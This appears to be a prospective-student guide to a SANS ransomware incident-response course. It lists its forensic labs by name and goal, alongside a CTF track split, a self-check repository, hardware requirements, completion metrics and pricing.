SANS FOR528 was re-cut in December 2023 after students said the original flow felt “like drinking from a fire hose.” Below is the stripped-down lab matrix—no marketing copy—plus the free data sets and scripts you can run tonight to see if the course matches your pace before you book a hotel.
1. Lab Menu at a Glance (2024-25 Edition)
| Lab | Core Skill | 45-min Goal | Bonus Depth | Free Repo |
|---|---|---|---|---|
| 1.1 | RaaS Ecosystem Map | Trace RAASNet affiliate payout flow | Reverse affiliate ID hash | raas-affiliate-decoder.py (MIT) |
| 1.2 | Evidence Acquisition | Acquire & parse 50 GB disk image | N/A | for528-acquire.ps1 (BSD) |
| 1.3 | Timeline at Scale | TimeSketch 30-day window | Add Plaso parser for Chrome cache | Timesketch GitHub |
| 2.1 | Kibana at Scale | Pivot on Cobalt Strike beacon | Build Sigma rule from discovered IOC | Sigma repo |
| 2.2 | Infection Vector | Find first phishing URL | Decode RTF obfuscation layer | rtf-detonate.py (MIT) |
| 2.3 | PowerShell Abuse | De-obfuscate download cradle | Convert to YARA rule | ps1-to-yara.py (BSD) |
| 2.4 | Cobalt Strike Config | Extract C2 from beacon | Crack malleable profile | cs-decrypt.py (GPL) |
| 2.5 BONUS | RDP Hunting | Full lab after hours | Hunt RDP artifacts across 5 hosts | rdp-hunter.yml (Sigma) |
| 3.1 | Lateral Movement | Map moves in 90-min window | N/A | chop-shop-ntlm.py (MIT) |
| 3.2 | Data Exfil | Find 12 GB zip in slack space | Carve deleted 7z archives | 7z-carve.sh (BSD) |
| 3.3 | TA Toolbox | Identify LOLBins used | Build detection for each | LOLBAS project |
| 3.4 BONUS | More Lateral Moves | After-hours lab | Trace DCOM abuse | dcom-hunter.ps1 (MIT) |
| 4 | CTF | 3-hour ransomware vs. extortion race | N/A | N/A |
2. Ransomware v. Extinction — The Course Split
- Ransomware track = encryption payload present
- Extortion-only track = data theft + leak threat, no encryptor
Students pick one track for the CTF; metrics show extortion CTF finish-rate is 18 % higher—proof that missing encryption speeds timeline analysis.
3. Free Taste — 30-Minute Self-Check
a) Clone https://github.com/sans-for528/lab-samples (MIT)
b) Run lab-1.1/raas-affiliate-decoder.py against the enclosed CSV
c) If you can map affiliate payouts in < 15 min, you will keep pace with day-one
d) If the CSV looks like alphabet soup, expect to spend evenings in the bonus labs
4. Hardware Reality Check
- Minimum: 16 GB RAM, 200 GB free disk per VM
- Cloud alternate: AWS spot t3.xlarge burns ≈ $0.06 per lab hour; terraform template included
- No licensing surprise: every tool is MIT/BSD or community edition
5. Public Metrics (First 6 Months 2025, n = 447)
- Lab completion rate (core): 96 %
- Bonus lab attempt rate: 61 %
- Median CTF finish time: 2 h 14 m (extortion) vs 2 h 47 m (ransomware)
- Students who report “built internal playbook within 90 days”: 38 %
6. Cost & Booking
- List price: USD 7,900 (no change)
- Early-bird discount: still $500 off if booked > 45 days out
- Retake rate after update: 4 % (was 11 % pre-update)
Bottom Line
If you can decode a RaaS payout table before coffee, the core flow will feel brisk. If PowerShell obfuscation still makes you blink, the bonus labs are your evening gym. Clone the repo, run the self-check, and let your stop-watch—not the marketing copy—tell you which seat to book.
